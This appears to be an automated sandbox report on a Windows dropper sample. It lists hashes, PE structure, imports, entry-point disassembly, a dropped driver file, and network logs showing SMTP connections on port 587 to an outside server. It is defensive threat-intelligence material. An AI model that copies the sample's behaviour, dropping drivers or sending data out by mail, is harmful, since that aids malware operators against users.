SHA-256:	BDFA725EC2A2C8EA5861D9B4C2F608E631A183FCA7916C1E07A28B656CC8EC0C
SHA-512:	C7F5BAAD732424B975A426867D3D8B5424AA830AA172ED0FF0EF630070BF2B4213750E123A36D8C5A741E22D3999CA1D7E77C62D4B77D6295B20A38114B7843C
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 3%
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................................................................................................................................................................................................................................................................................PE..L....>.{..................................... ....@.......................... .......c........... ..............................................................H....................................................................................text............................... ..`.data........ ...P..................@....tls.................`..............@....rdata...............b..............@..P.idata... ...........d..............@..@.edata...............\|..8...,...@...@..@

C:\Users\Public\Libraries\truesight.sys

Download File

Process:	C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe
File Type:	PE32+ executable (native) x86-64, for MS Windows
Category:	dropped
Size (bytes):	53696
Entropy (8bit):	6.830243356027624
Encrypted:	false
SSDEEP:	768:58GYJAAcoglJBtzCMSS4cTl9zIG3Hzuaq1ocezTBk4/HvAMxkExHs1R9zZ1SP8P:xKAAhYJz53WloceBkGHvxxIzzSPG
MD5:	F53FA44C7B591A2BE105344790543369
SHA1:	363068731E87BCEE19AD5CB802E14F9248465D31
SHA-256:	BFC2EF3B404294FE2FA05A8B71C7F786B58519175B7202A69FE30F45E607FF1C
SHA-512:	55B7B7CDA3729598F0EA47C5C67761C2A6B3DC72189C5324F334BDF19BEF6CE83218C41659BA2BC4783DAA8B35A4F1D4F93EF33F667F4880258CD835A10724D9
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 8%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...rp..rp..rp..)...vp..)...wp..)...qp..rp..$p..)...up......\|p......sp......sp..Richrp..................PE..d...}..d.........."......X..."......p..........@...........................................A................................................\...(............p..D....~...S......l...@I..8............................I...............@..X............................text....-.......................... ..h.rdata.......@.......2..............@..H.data... ....`.......D..............@....pdata..D....p.......H..............@..HPAGE.................N.............. ..`INIT.................l.............. ..b.rsrc................x..............@..B.reloc..l............\|..............@..B........................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.4228083954221695
TrID:	Win32 Executable (generic) a (10002005/4) 99.38% InstallShield setup (43055/19) 0.43% Windows Screen Saver (13104/52) 0.13% Win16/32 Executable Delphi generic (2074/23) 0.02% Generic Win/DOS Executable (2004/3) 0.02%
File name:	SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe
File size:	1'693'184 bytes
MD5:	39ad433c9ba920e7fd0961c66ac7079e
SHA1:	8a54961347eab2253e2004e33f399c4cd07c8577
SHA256:	e1471b0576c26d33b4fda732a7e0aba43193849ef1de6bbcdd42e8724354dd00
SHA512:	676da03f46446ad3a6e83e7b0d6648e6c82e25d0866fbe13f85ea0a3ec6ffb9fb507b28ae69638a4cf62d51b0aefb934bd20d77605a78d1f8652ef2fd5d38b71
SSDEEP:	24576:iyB7eQVOovzwkKEFL3WlrpY7Gv1eeajEja3KgffHCx2GwV/6ltVIaH3:D9VmuL3WZ7vcVjEvGHaKViFJ3
TLSH:	0675DF93368081F2D1310538DF6AD5F9897F7E782925E05A32C8BEDCBF7A64265082D7
File Content Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

File Icon


Icon Hash:	62e080a2ab92a3a2

Static PE Info

General

Entrypoint:	0x45a79c
Entrypoint Section:	.itext
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
DLL Characteristics:
Time Stamp:	0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	08cf44088e151648126443381e7f459e

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
add esp, FFFFFFF0h
mov eax, 004596D0h
call 00007FE880F36D91h
mov eax, dword ptr [00583618h]
mov eax, dword ptr [eax]
call 00007FE880F841B1h
mov ecx, dword ptr [00583798h]
mov eax, dword ptr [00583618h]
mov eax, dword ptr [eax]
mov edx, dword ptr [00459508h]
call 00007FE880F841B1h
mov eax, dword ptr [00583618h]
mov eax, dword ptr [eax]
call 00007FE880F84225h
call 00007FE880F34C20h
lea eax, dword ptr [eax+00h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x188000	0x25f4	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x194000	0x12e00	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x18d000	0x6164	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x18c000	0x18	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x188738	0x5e4	.idata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x58918	0x58a00	c5095fa7b0b31f3066c395b0d1d18ab3	False	0.5273740523624824	data	6.540566508608764	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.itext	0x5a000	0x7e4	0x800	67eca1f15095a0ab06a3e71544486964	False	0.62890625	data	6.182004210688925	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data	0x5b000	0x1287b4	0x128800	46670e29fe10a49ed1b5ffbdcd946ee3	False	0.7087851101391232	data	7.443226968023859	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.bss	0x184000	0x3670	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x188000	0x25f4	0x2600	eff6ca613b557f766154838c2000898e	False	0.3247327302631579	data	5.198920810498565	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls	0x18b000	0x34	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata	0x18c000	0x18	0x200	4be143db2e0b6a8ec71d591c7b9f161f	False	0.05078125	data	0.2108262677871819	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x18d000	0x6164	0x6200	94f952c66f78ea5bdd327d392fc4a9d2	False	0.6551339285714286	data	6.695398381676511	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.rsrc	0x194000	0x12e00	0x12e00	ba908c0648cd85798902db3e9b2423b7	False	0.2046512831125828	data	3.922411598134611	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_CURSOR	0x194b54	0x134	Targa image data - Map 64 x 65536 x 1 +32 "\001"	English	United States	0.38636363636363635
RT_CURSOR	0x194c88	0x134	data	English	United States	0.4642857142857143
RT_CURSOR	0x194dbc	0x134	data	English	United States	0.4805194805194805
RT_CURSOR	0x194ef0	0x134	data	English	United States	0.38311688311688313
RT_CURSOR	0x195024	0x134	data	English	United States	0.36038961038961037
RT_CURSOR	0x195158	0x134	data	English	United States	0.4090909090909091
RT_CURSOR	0x19528c	0x134	Targa image data - RGB 64 x 65536 x 1 +32 "\001"	English	United States	0.4967532467532468
RT_BITMAP	0x1953c0	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360	English	United States	0.43103448275862066
RT_BITMAP	0x195590	0x1e4	Device independent bitmap graphic, 36 x 19 x 4, image size 380	English	United States	0.46487603305785125
RT_BITMAP	0x195774	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360	English	United States	0.43103448275862066
RT_BITMAP	0x195944	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360	English	United States	0.39870689655172414
RT_BITMAP	0x195b14	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360	English	United States	0.4245689655172414
RT_BITMAP	0x195ce4	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360	English	United States	0.5021551724137931
RT_BITMAP	0x195eb4	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360	English	United States	0.5064655172413793
RT_BITMAP	0x196084	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360	English	United States	0.39655172413793105
RT_BITMAP	0x196254	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360	English	United States	0.5344827586206896
RT_BITMAP	0x196424	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360	English	United States	0.39655172413793105
RT_BITMAP	0x1965f4	0xe8	Device independent bitmap graphic, 16 x 16 x 4, image size 128	English	United States	0.4870689655172414
RT_ICON	0x1966dc	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 11811 x 11811 px/m			0.3962765957446808
RT_ICON	0x196b44	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2304, resolution 11811 x 11811 px/m			0.27909836065573773
RT_ICON	0x1974cc	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 11811 x 11811 px/m			0.2178705440900563
RT_ICON	0x198574	0x5488	Device independent bitmap graphic, 72 x 144 x 32, image size 20736, resolution 11811 x 11811 px/m			0.14875231053604437
RT_ICON	0x19d9fc	0x67e8	Device independent bitmap graphic, 80 x 160 x 32, image size 25600, resolution 11811 x 11811 px/m			0.14462406015037593
RT_DIALOG	0x1a41e4	0x52	data			0.7682926829268293
RT_DIALOG	0x1a4238	0x52	data			0.7560975609756098
RT_STRING	0x1a428c	0x170	data			0.4945652173913043
RT_STRING	0x1a43fc	0x2b4	data			0.476878612716763
RT_STRING	0x1a46b0	0xb4	data			0.6888888888888889
RT_STRING	0x1a4764	0xe8	data			0.6422413793103449
RT_STRING	0x1a484c	0x2a8	data			0.4764705882352941
RT_STRING	0x1a4af4	0x3e8	data			0.382
RT_STRING	0x1a4edc	0x370	data			0.4022727272727273
RT_STRING	0x1a524c	0x3cc	data			0.33539094650205764
RT_STRING	0x1a5618	0x214	data			0.49624060150375937
RT_STRING	0x1a582c	0xcc	data			0.6274509803921569
RT_STRING	0x1a58f8	0x194	data			0.5643564356435643
RT_STRING	0x1a5a8c	0x3c4	data			0.3288381742738589
RT_STRING	0x1a5e50	0x338	data			0.42961165048543687
RT_STRING	0x1a6188	0x294	data			0.42424242424242425
RT_RCDATA	0x1a641c	0x10	data			1.5
RT_RCDATA	0x1a642c	0x2d8	data			0.7225274725274725
RT_RCDATA	0x1a6704	0x588	Delphi compiled form 'TAniToolForm'			0.422316384180791
RT_GROUP_CURSOR	0x1a6c8c	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.25
RT_GROUP_CURSOR	0x1a6ca0	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.25
RT_GROUP_CURSOR	0x1a6cb4	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.3
RT_GROUP_CURSOR	0x1a6cc8	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.3
RT_GROUP_CURSOR	0x1a6cdc	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.3
RT_GROUP_CURSOR	0x1a6cf0	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.3
RT_GROUP_CURSOR	0x1a6d04	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.3
RT_GROUP_ICON	0x1a6d18	0x4c	data			0.8421052631578947

Imports

DLL	Import
oleaut32.dll	SysFreeString, SysReAllocStringLen, SysAllocStringLen
advapi32.dll	RegQueryValueExA, RegOpenKeyExA, RegCloseKey
user32.dll	GetKeyboardType, DestroyWindow, LoadStringA, MessageBoxA, CharNextA
kernel32.dll	GetACP, Sleep, VirtualFree, VirtualAlloc, GetTickCount, QueryPerformanceCounter, GetCurrentThreadId, InterlockedDecrement, InterlockedIncrement, VirtualQuery, WideCharToMultiByte, MultiByteToWideChar, lstrlenA, lstrcpynA, LoadLibraryExA, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetCommandLineA, FreeLibrary, FindFirstFileA, FindClose, ExitProcess, CompareStringA, WriteFile, UnhandledExceptionFilter, RtlUnwind, RaiseException, GetStdHandle
kernel32.dll	TlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA
user32.dll	CreateWindowExA, WindowFromPoint, WaitMessage, UpdateWindow, UnregisterClassA, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, SystemParametersInfoA, ShowWindow, ShowScrollBar, ShowOwnedPopups, SetWindowsHookExA, SetWindowPos, SetWindowPlacement, SetWindowLongW, SetWindowLongA, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRect, SetPropA, SetParent, SetMenuItemInfoA, SetMenu, SetForegroundWindow, SetFocus, SetCursor, SetClassLongA, SetCapture, SetActiveWindow, SendMessageW, SendMessageA, ScrollWindow, ScreenToClient, RemovePropA, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageA, RegisterClipboardFormatA, RegisterClassA, RedrawWindow, PtInRect, PostQuitMessage, PostMessageA, PeekMessageW, PeekMessageA, OffsetRect, OemToCharA, MessageBoxA, MapWindowPoints, MapVirtualKeyA, LoadStringA, LoadKeyboardLayoutA, LoadIconA, LoadCursorA, LoadBitmapA, KillTimer, IsZoomed, IsWindowVisible, IsWindowUnicode, IsWindowEnabled, IsWindow, IsRectEmpty, IsIconic, IsDialogMessageW, IsDialogMessageA, IsChild, InvalidateRect, IntersectRect, InsertMenuItemA, InsertMenuA, InflateRect, GetWindowThreadProcessId, GetWindowTextA, GetWindowRect, GetWindowPlacement, GetWindowLongW, GetWindowLongA, GetWindowDC, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetPropA, GetParent, GetWindow, GetMessagePos, GetMenuStringA, GetMenuState, GetMenuItemInfoA, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutNameA, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextA, GetIconInfo, GetForegroundWindow, GetFocus, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClientRect, GetClassLongA, GetClassInfoA, GetCapture, GetActiveWindow, FrameRect, FindWindowA, FillRect, EqualRect, EnumWindows, EnumThreadWindows, EnumChildWindows, EndPaint, EnableWindow, EnableScrollBar, EnableMenuItem, DrawTextA, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawEdge, DispatchMessageW, DispatchMessageA, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DefWindowProcA, DefMDIChildProcA, DefFrameProcA, CreatePopupMenu, CreateMenu, CreateIcon, ClientToScreen, CheckMenuItem, CallWindowProcA, CallNextHookEx, BeginPaint, CharNextA, CharLowerA, CharToOemA, AdjustWindowRectEx, ActivateKeyboardLayout
gdi32.dll	UnrealizeObject, StretchBlt, SetWindowOrgEx, SetViewportOrgEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixel, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SelectPalette, SelectObject, SaveDC, RestoreDC, RectVisible, RealizePalette, PatBlt, MoveToEx, MaskBlt, LineTo, IntersectClipRect, GetWindowOrgEx, GetTextMetricsA, GetTextExtentPoint32A, GetSystemPaletteEntries, GetStockObject, GetRgnBox, GetPixel, GetPaletteEntries, GetObjectA, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetDCOrgEx, GetCurrentPositionEx, GetClipBox, GetBrushOrgEx, GetBitmapBits, ExcludeClipRect, DeleteObject, DeleteDC, CreateSolidBrush, CreatePenIndirect, CreatePalette, CreateHalftonePalette, CreateFontIndirectA, CreateDIBitmap, CreateDIBSection, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, BitBlt
version.dll	VerQueryValueA, GetFileVersionInfoSizeA, GetFileVersionInfoA
kernel32.dll	lstrcpyA, WriteFile, WaitForSingleObject, VirtualQuery, VirtualAlloc, SizeofResource, SetThreadLocale, SetFilePointer, SetEvent, SetErrorMode, SetEndOfFile, ResetEvent, ReadFile, MultiByteToWideChar, MulDiv, LockResource, LoadResource, LoadLibraryExA, LoadLibraryA, LeaveCriticalSection, InitializeCriticalSection, GlobalFindAtomA, GlobalDeleteAtom, GlobalAddAtomA, GetVersionExA, GetVersion, GetTickCount, GetThreadLocale, GetStdHandle, GetProcAddress, GetModuleHandleW, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLocalTime, GetLastError, GetFullPathNameA, GetDiskFreeSpaceA, GetDateFormatA, GetCurrentThreadId, GetCurrentProcessId, GetCurrentProcess, GetCPInfo, FreeResource, InterlockedExchange, FreeLibrary, FormatMessageA, FindResourceA, EnumCalendarInfoA, EnterCriticalSection, DeleteCriticalSection, CreateThread, CreateFileA, CreateEventA, CompareStringA, CloseHandle
advapi32.dll	RegQueryValueExA, RegOpenKeyExA, RegFlushKey, RegCloseKey
oleaut32.dll	GetErrorInfo, SysFreeString
ole32.dll	CoUninitialize, CoInitialize
kernel32.dll	Sleep
oleaut32.dll	SafeArrayPtrOfIndex, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopy, VariantClear, VariantInit
comctl32.dll	_TrackMouseEvent, ImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_DragShowNolock, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Remove, ImageList_DrawEx, ImageList_Draw, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_Add, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create
uRL	FileProtocolHandlerA

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 24, 2024 21:31:55.927943945 CET	49729	443	192.168.2.4	13.107.139.11
Jan 24, 2024 21:31:55.928025007 CET	443	49729	13.107.139.11	192.168.2.4
Jan 24, 2024 21:31:55.928117037 CET	49729	443	192.168.2.4	13.107.139.11
Jan 24, 2024 21:31:55.928493023 CET	49729	443	192.168.2.4	13.107.139.11
Jan 24, 2024 21:31:55.928607941 CET	443	49729	13.107.139.11	192.168.2.4
Jan 24, 2024 21:31:55.928790092 CET	49729	443	192.168.2.4	13.107.139.11
Jan 24, 2024 21:31:55.970760107 CET	49730	443	192.168.2.4	13.107.139.11
Jan 24, 2024 21:31:55.970838070 CET	443	49730	13.107.139.11	192.168.2.4
Jan 24, 2024 21:31:55.971120119 CET	49730	443	192.168.2.4	13.107.139.11
Jan 24, 2024 21:31:55.974508047 CET	49730	443	192.168.2.4	13.107.139.11
Jan 24, 2024 21:31:55.974586964 CET	443	49730	13.107.139.11	192.168.2.4
Jan 24, 2024 21:31:56.368331909 CET	443	49730	13.107.139.11	192.168.2.4
Jan 24, 2024 21:31:56.368535042 CET	49730	443	192.168.2.4	13.107.139.11
Jan 24, 2024 21:31:56.371516943 CET	49730	443	192.168.2.4	13.107.139.11
Jan 24, 2024 21:31:56.371567965 CET	443	49730	13.107.139.11	192.168.2.4
Jan 24, 2024 21:31:56.371988058 CET	443	49730	13.107.139.11	192.168.2.4
Jan 24, 2024 21:31:56.424204111 CET	49730	443	192.168.2.4	13.107.139.11
Jan 24, 2024 21:31:56.443826914 CET	49730	443	192.168.2.4	13.107.139.11
Jan 24, 2024 21:31:56.485944986 CET	443	49730	13.107.139.11	192.168.2.4
Jan 24, 2024 21:31:56.840583086 CET	443	49730	13.107.139.11	192.168.2.4
Jan 24, 2024 21:31:56.840802908 CET	443	49730	13.107.139.11	192.168.2.4
Jan 24, 2024 21:31:56.840974092 CET	49730	443	192.168.2.4	13.107.139.11
Jan 24, 2024 21:31:56.842767954 CET	49730	443	192.168.2.4	13.107.139.11
Jan 24, 2024 21:31:56.842828989 CET	443	49730	13.107.139.11	192.168.2.4
Jan 24, 2024 21:31:56.842875957 CET	49730	443	192.168.2.4	13.107.139.11
Jan 24, 2024 21:31:56.842894077 CET	443	49730	13.107.139.11	192.168.2.4
Jan 24, 2024 21:32:01.086843014 CET	49732	443	192.168.2.4	173.231.16.75
Jan 24, 2024 21:32:01.086925030 CET	443	49732	173.231.16.75	192.168.2.4
Jan 24, 2024 21:32:01.087007046 CET	49732	443	192.168.2.4	173.231.16.75
Jan 24, 2024 21:32:01.100971937 CET	49732	443	192.168.2.4	173.231.16.75
Jan 24, 2024 21:32:01.101007938 CET	443	49732	173.231.16.75	192.168.2.4
Jan 24, 2024 21:32:01.582357883 CET	443	49732	173.231.16.75	192.168.2.4
Jan 24, 2024 21:32:01.582588911 CET	49732	443	192.168.2.4	173.231.16.75
Jan 24, 2024 21:32:01.584274054 CET	49732	443	192.168.2.4	173.231.16.75
Jan 24, 2024 21:32:01.584300995 CET	443	49732	173.231.16.75	192.168.2.4
Jan 24, 2024 21:32:01.584731102 CET	443	49732	173.231.16.75	192.168.2.4
Jan 24, 2024 21:32:01.626107931 CET	49732	443	192.168.2.4	173.231.16.75
Jan 24, 2024 21:32:01.660155058 CET	49732	443	192.168.2.4	173.231.16.75
Jan 24, 2024 21:32:01.705900908 CET	443	49732	173.231.16.75	192.168.2.4
Jan 24, 2024 21:32:01.877016068 CET	443	49732	173.231.16.75	192.168.2.4
Jan 24, 2024 21:32:01.877100945 CET	443	49732	173.231.16.75	192.168.2.4
Jan 24, 2024 21:32:01.877162933 CET	49732	443	192.168.2.4	173.231.16.75
Jan 24, 2024 21:32:01.885267019 CET	49732	443	192.168.2.4	173.231.16.75
Jan 24, 2024 21:32:03.321365118 CET	49733	587	192.168.2.4	185.56.136.50
Jan 24, 2024 21:32:03.523353100 CET	587	49733	185.56.136.50	192.168.2.4
Jan 24, 2024 21:32:03.523458004 CET	49733	587	192.168.2.4	185.56.136.50
Jan 24, 2024 21:32:03.750426054 CET	587	49733	185.56.136.50	192.168.2.4
Jan 24, 2024 21:32:03.750741005 CET	49733	587	192.168.2.4	185.56.136.50
Jan 24, 2024 21:32:03.953141928 CET	587	49733	185.56.136.50	192.168.2.4
Jan 24, 2024 21:32:03.953315973 CET	49733	587	192.168.2.4	185.56.136.50
Jan 24, 2024 21:32:04.156770945 CET	587	49733	185.56.136.50	192.168.2.4
Jan 24, 2024 21:32:04.157536030 CET	49733	587	192.168.2.4	185.56.136.50
Jan 24, 2024 21:32:04.370861053 CET	587	49733	185.56.136.50	192.168.2.4
Jan 24, 2024 21:32:04.370923042 CET	587	49733	185.56.136.50	192.168.2.4
Jan 24, 2024 21:32:04.370964050 CET	587	49733	185.56.136.50	192.168.2.4
Jan 24, 2024 21:32:04.371007919 CET	587	49733	185.56.136.50	192.168.2.4
Jan 24, 2024 21:32:04.371120930 CET	49733	587	192.168.2.4	185.56.136.50
Jan 24, 2024 21:32:04.371120930 CET	49733	587	192.168.2.4	185.56.136.50
Jan 24, 2024 21:32:04.373204947 CET	587	49733	185.56.136.50	192.168.2.4
Jan 24, 2024 21:32:04.407224894 CET	49733	587	192.168.2.4	185.56.136.50
Jan 24, 2024 21:32:04.609428883 CET	587	49733	185.56.136.50	192.168.2.4
Jan 24, 2024 21:32:04.622334957 CET	49733	587	192.168.2.4	185.56.136.50
Jan 24, 2024 21:32:04.824451923 CET	587	49733	185.56.136.50	192.168.2.4
Jan 24, 2024 21:32:04.825787067 CET	49733	587	192.168.2.4	185.56.136.50
Jan 24, 2024 21:32:05.028372049 CET	587	49733	185.56.136.50	192.168.2.4
Jan 24, 2024 21:32:05.028685093 CET	49733	587	192.168.2.4	185.56.136.50
Jan 24, 2024 21:32:05.258574963 CET	587	49733	185.56.136.50	192.168.2.4
Jan 24, 2024 21:32:05.258853912 CET	49733	587	192.168.2.4	185.56.136.50
Jan 24, 2024 21:32:05.460813046 CET	587	49733	185.56.136.50	192.168.2.4
Jan 24, 2024 21:32:05.461158037 CET	49733	587	192.168.2.4	185.56.136.50
Jan 24, 2024 21:32:05.675802946 CET	587	49733	185.56.136.50	192.168.2.4
Jan 24, 2024 21:32:05.676090956 CET	49733	587	192.168.2.4	185.56.136.50
Jan 24, 2024 21:32:05.877872944 CET	587	49733	185.56.136.50	192.168.2.4
Jan 24, 2024 21:32:05.878406048 CET	49733	587	192.168.2.4	185.56.136.50
Jan 24, 2024 21:32:05.878470898 CET	49733	587	192.168.2.4	185.56.136.50
Jan 24, 2024 21:32:05.878506899 CET	49733	587	192.168.2.4	185.56.136.50
Jan 24, 2024 21:32:05.878540039 CET	49733	587	192.168.2.4	185.56.136.50
Jan 24, 2024 21:32:06.080343962 CET	587	49733	185.56.136.50	192.168.2.4
Jan 24, 2024 21:32:06.080430031 CET	587	49733	185.56.136.50	192.168.2.4
Jan 24, 2024 21:32:06.080466032 CET	587	49733	185.56.136.50	192.168.2.4
Jan 24, 2024 21:32:06.080502033 CET	587	49733	185.56.136.50	192.168.2.4
Jan 24, 2024 21:32:06.083410025 CET	587	49733	185.56.136.50	192.168.2.4
Jan 24, 2024 21:32:06.124089003 CET	49733	587	192.168.2.4	185.56.136.50
Jan 24, 2024 21:32:06.157639980 CET	49733	587	192.168.2.4	185.56.136.50
Jan 24, 2024 21:32:06.360555887 CET	587	49733	185.56.136.50	192.168.2.4
Jan 24, 2024 21:32:06.360975027 CET	49733	587	192.168.2.4	185.56.136.50
Jan 24, 2024 21:32:06.362529993 CET	49734	587	192.168.2.4	185.56.136.50
Jan 24, 2024 21:32:06.571562052 CET	587	49734	185.56.136.50	192.168.2.4
Jan 24, 2024 21:32:06.571886063 CET	49734	587	192.168.2.4	185.56.136.50
Jan 24, 2024 21:32:06.793358088 CET	587	49734	185.56.136.50	192.168.2.4
Jan 24, 2024 21:32:06.793535948 CET	49734	587	192.168.2.4	185.56.136.50
Jan 24, 2024 21:32:07.003293991 CET	587	49734	185.56.136.50	192.168.2.4
Jan 24, 2024 21:32:07.003446102 CET	49734	587	192.168.2.4	185.56.136.50
Jan 24, 2024 21:32:07.213927031 CET	587	49734	185.56.136.50	192.168.2.4
Jan 24, 2024 21:32:07.214423895 CET	49734	587	192.168.2.4	185.56.136.50
Jan 24, 2024 21:32:07.435010910 CET	587	49734	185.56.136.50	192.168.2.4
Jan 24, 2024 21:32:07.435072899 CET	587	49734	185.56.136.50	192.168.2.4
Jan 24, 2024 21:32:07.435112000 CET	587	49734	185.56.136.50	192.168.2.4
Jan 24, 2024 21:32:07.435149908 CET	587	49734	185.56.136.50	192.168.2.4
Jan 24, 2024 21:32:07.435283899 CET	49734	587	192.168.2.4	185.56.136.50
